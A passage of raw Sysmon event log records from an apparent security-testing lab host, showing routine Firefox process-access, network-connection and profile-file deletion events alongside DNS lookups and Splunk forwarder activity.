Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105459Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.635{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0e190|C:\Program Files\Mozilla Firefox\xul.dll+c0db0d|C:\Program Files\Mozilla Firefox\xul.dll+c06b06|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+bedfc3|C:\Program Files\Mozilla Firefox\xul.dll+bed195 10341000x8000000000000000105458Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.635{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0dc1b|C:\Program Files\Mozilla Firefox\xul.dll+c069d2|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79|C:\Program Files\Mozilla Firefox\xul.dll+39a61b 10341000x8000000000000000105457Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.635{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0dc1b|C:\Program Files\Mozilla Firefox\xul.dll+c069d2|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79|C:\Program Files\Mozilla Firefox\xul.dll+39a61b 10341000x8000000000000000105456Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.635{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0dc1b|C:\Program Files\Mozilla Firefox\xul.dll+c069d2|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79|C:\Program Files\Mozilla Firefox\xul.dll+39a61b 354300x8000000000000000105455Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.703{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51747-false18.66.139.97-443https 354300x8000000000000000105454Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.703{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64263- 354300x8000000000000000105453Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.703{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51746-false18.66.139.97-443https 354300x8000000000000000105452Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.702{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49456- 354300x8000000000000000105451Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.697{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63193- 23542300x8000000000000000105450Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.582{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\cert9.db-journalMD5=1F0EF48E7B2AD74F5BA5AAF6FC961946,SHA256=E1B5EB4FC2431A92075A37E3EDAF0AA7D497175361D8C9CDCA69FDCC20347B06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105449Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.515{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-walMD5=B7FD8D409B142445760638EF343E841E,SHA256=41707C2527426B9D22B07D51DCDA77446B953F4481CFBE521CEA854D633A159F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105448Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.515{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=C7F1886B1A04BAC6CF98EC5DD5510803,SHA256=4DA72223A5A4407200EBAADF293B7B0A7B18586C6302B3B7E4640C7BBF4CD333,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105447Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.498{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-journalMD5=830A0E198080341770496257F60422CC,SHA256=8E76FAC5BB8EDB83F3EAE6A3A464FEA61E3F75967B5334400E2614491D49B239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105446Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.482{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-journalMD5=8F947A8DFD5203DC1403860F2B903CFB,SHA256=8275932FD995CE12309D1FA8E7344AB30914C8FD39C853CD547140AE5C7C8116,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105445Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.451{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0e190|C:\Program Files\Mozilla Firefox\xul.dll+c0db0d|C:\Program Files\Mozilla Firefox\xul.dll+c06ba4|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+bedfc3|C:\Program Files\Mozilla Firefox\xul.dll+1f0f57c 23542300x8000000000000000105444Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.435{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\webappsstore.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105443Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.435{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\webappsstore.sqlite-walMD5=7246C739EBAC50A9094E8707BAA324C7,SHA256=A81B6022E179C06AEC1F9870D63FA555EB114D41D0F2411CE268D03458B0E205,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105442Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.435{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\webappsstore.sqlite-shmMD5=D7497CF2ADEC8FAF0846809FC9A1A963,SHA256=DE18BAB674667D7E13B3E5455B5308A618A58DA33F5BB5048529957E0519F871,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105441Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.431{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105440Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.414{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\webappsstore.sqlite-journalMD5=ADAC4A8C8C986C01C6CBC326EE531EFC,SHA256=C50C779B1E5F03985CE0C4824A93CB1B1518DBC069B3E690D23BF7FBC43C1907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105439Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.367{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105438Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.367{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A366FABA07AF01C9E637937CBA34D8C,SHA256=BBFB1C4FB42107DFA10D23E089442B8950630D93AC27FDDF0A2324AA416562D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105437Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.360{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51745-false93.184.220.29-80http 10341000x8000000000000000105436Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.334{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105435Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.334{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105434Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.298{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105433Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.298{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105432Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.298{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105431Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.298{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105430Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.298{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105429Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.298{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|UNKNOWN(0000037E879B466F) 10341000x8000000000000000105428Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.251{58E9C193-B422-615A-0602-00000000FC01}55524812C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a0b461|C:\Program Files\Mozilla Firefox\xul.dll+a6c6e5|C:\Program Files\Mozilla Firefox\xul.dll+d0281|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+1747b79|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+26742|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105427Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.236{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105426Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.236{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105425Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.236{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4efc8|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a5b7d9|C:\Program Files\Mozilla 